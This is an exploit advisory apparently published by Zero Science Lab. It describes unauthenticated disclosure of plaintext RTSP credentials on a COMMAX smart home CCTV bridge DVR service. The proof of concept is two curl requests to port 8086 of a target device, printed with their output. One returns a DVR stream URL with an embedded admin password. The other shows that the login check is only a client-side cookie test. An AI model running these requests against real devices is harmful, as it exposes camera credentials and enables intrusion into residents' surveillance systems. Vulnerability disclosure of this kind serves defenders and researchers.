# Exploit Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com

COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure

Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: n/a

Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.

Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker
to disclose RTSP credentials in plain-text.

Tested on: GoAhead-Webs


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5665
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php


02.08.2021

--


$ curl http://TARGET:8086/overview.asp
<HTML>
<HEAD>
<TITLE> Infomation</TITLE>
<script src="./jquery.min.js"></script>
<script src="./jquery.cookie.js"></script>
<script src="./login_check.js"></script>
</HEAD>
<BODY>
<br><br>
<center>
<table>
<tr><td>
<li> [2021/08/15 09:56:46]  Started <BR> <li> MAX USER : 32 <BR> <li> DVR Lists <BR>[1] rtsp://admin:s3cr3tP@$$w0rd@10.0.0.17:554/Streaming/Channels/2:554 <BR>
</td></tr>
</table>
</center>
</BODY>
</HTML>


$ curl http://TARGET:8086/login_check.js:
var server_ip = $(location).attr('host');
var server_domain = server_ip.replace(":8086", "");

document.domain = server_domain;

var cookiesAuth = $.cookie("cookiesAuth");

if (cookiesAuth != "authok") {
    parent.document.location.href = "http://" + server_domain + ":8086/home.asp";
}